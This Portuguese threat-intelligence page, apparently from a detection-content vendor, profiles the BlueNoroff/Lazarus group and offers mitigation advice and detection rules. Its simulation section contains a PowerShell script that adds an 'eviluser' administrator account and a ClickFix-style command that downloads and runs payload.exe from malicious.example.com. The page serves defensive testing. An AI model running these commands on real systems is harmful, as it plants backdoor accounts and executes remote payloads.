Grupo BlueNoroff: O Braço de Cibercrime Financeiro do Lazarus
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
BlueNoroff é um subgrupo do ecossistema Lazarus voltado para atividades financeiras, focando em operações de roubo de alto valor contra bancos, empresas de criptomoedas e alvos mais amplos da Web3. As táticas do grupo abrangem fraudes habilitadas por SWIFT, comprometimentos de watering-hole, envenenamento da cadeia de suprimentos de pacotes Go e caminhos de intrusão macOS construídos em torno de iscas de “entrevistas de emprego” falsas. Para alcançar execução e persistência, BlueNoroff mescla uma pilha de malware modular Rust/Go com AppleScript, VBScript e fluxos de engenharia social projetados para contornar a cautela do usuário e se misturar com atividades legítimas de desenvolvimento e administração.
Investigação
O relatório rastreia a trajetória do BlueNoroff desde o assalto ao Banco de Bangladesh em 2016 até atividades mais recentes da era 2025 na cadeia de suprimentos, destacando como as ferramentas e alvos do ator se expandiram junto com o ecossistema cripto/Web3. Pesquisadores delineiam padrões de infraestrutura e catalogam componentes de malware incluindo GhostCall, GhostHire, RustBucket e GillyInjector. A investigação também mapeia comportamentos observados no MITRE ATT&CK, abrangendo estágios como reconhecimento e acesso inicial, depois execução, persistência e roubo de credenciais, sublinhando uma ênfase consistente em manter discretos pontos de apoio, entrega planejada de cargas úteis e caminhos de acesso prontos para roubo.
Mitigação
Reduza a exposição apertando a higiene da cadeia de suprimentos: valide pacotes retirados de registros públicos, imponha controles de fixação e proveniência, e revise continuamente atualizações de dependências para mudanças inesperadas de mantenedores ou código. No macOS, fortaleça a governança de LaunchAgent/LaunchDaemon e monitore entradas de persistência suspeitas e ferramentas não assinadas. Bloqueie domínios semelhantes usados para entrega de iscas, imponha MFA para identidades privilegiadas e serviços expostos externamente, e operacionalize detecções para scripts, carregadores e técnicas de empacotamento maliciosas conhecidas associadas ao ator. Mantenha atualizações frequentes de inteligência de ameaças e reforçe o treinamento de usuários focado em phishing direcionado e padrões de engenharia social de “recrutadores/entrevistas de emprego”.
Resposta
Se indicadores de BlueNoroff forem descobertos, isole hosts afetados e preserve evidências chave, incluindo linhas de comando completas, conteúdo de scripts e binários soltos ou artefatos de pacotes. Bloqueie domínios maliciosos identificados e IPs de C2, então execute playbooks de resposta a incidentes alinhados a cenários de roubo de credenciais e comprometimento da cadeia de suprimentos. Implante ou ajuste detectores para cadeias de execução AppleScript e VBScript, e para padrões suspeitos de PowerShell apontados no relatório, depois amplie a caça para identificar endpoints adicionais expostos à mesma isca, dependência ou sobreposição de infraestrutura.
Fluxo de Ataque
Detecções
Possível Descoberta de Configuração de Rede do Sistema (via cmdline)
Visualizar
Possível Descoberta Remota de Sistema ou Verificação de Conectividade (via cmdline)
Visualizar
Binário / Scripts Suspeitos em Local de Inicialização (via file_event)
Visualizar
Possível Enumeração de Conta de Administrador ou Grupo (via cmdline)
Visualizar
IOCs (E-mails) para detectar: Grupo BlueNoroff: O Ramo de Cibercrime Financeiro de Lazarus
Visualizar
Detecção de Execução Maliciosa de AppleScript e ClickFix [Criação de Processo do Windows]
Visualizar
Enumeração de Usuários Locais e de Domínio via Comandos Net [Sysmon do Windows]
Visualizar
Obfuscação e Detecção de Codificação PowerShell BlueNoroff [Windows PowerShell]
Visualizar
Execução de Simulação
Pré-requisito: O Cheque de Telemetria & Linha de Base deve ter passado.
Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a erros de diagnóstico.
-
Narrativa e Comandos do Ataque:
- Execução de AppleScript (T1546.016) – O adversário solta um
payload.scptmalicioso no endpoint (por exemplo, via anexo de phishing). Usando umosascript.exepré-instalado (incluído com uma ferramenta de terceiros), eles iniciam o script para executar uma carga de PowerShell que adiciona uma nova conta de administrador local. - Entrega ClickFix de Área de Transferência (T1204.004) – O atacante copia um comando artesanal para a área de transferência que invoca
curlcom um agente de usuário no estilo Zoom para baixar uma carga de segunda etapa, em seguida, a executa imediatamente viacmd.exe. O comando também inclui uma chamada inlinepowershell.exe -cpara executar a carga útil na memória.
- Execução de AppleScript (T1546.016) – O adversário solta um
-
Script de Teste de Regressão: O script abaixo reproduz ambos os comportamentos de forma determinística.
#----- INÍCIO DO SCRIPT DE TESTE DE REGRESSÃO ----- # Certifique-se de que estamos executando com privilégios administrativos if (-not ([Security.Principal.WindowsPrincipal] ` [Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Error "Executar este script como Administrador." exit 1 } # 1. Execução de AppleScript via osascript.exe $appleScriptPath = "$env:TEMPmalicious.scpt" Set-Content -Path $appleScriptPath -Value @" tell application "System Events" do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`"" end tell "@ # Execute o AppleScript Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait # 2. Entrega ClickFix estilo área de transferência $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"' # Execute via cmd.exe para coincidir com a condição da regra Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait # Limpeza: remova artefatos Remove-Item -Path $appleScriptPath -Force Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Fim do script #----- FIM DO SCRIPT DE TESTE DE REGRESSÃO ----- -
Comandos de Limpeza: Remova qualquer processo, arquivo e conta de usuário de teste remanescente.
# Pare qualquer processo remanescente (defensivo – normalmente não é necessário) Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force # Exclua arquivos temporários Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Remova a conta de administrador de teste se foi criada if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) { Remove-LocalUser -Name "eviluser" }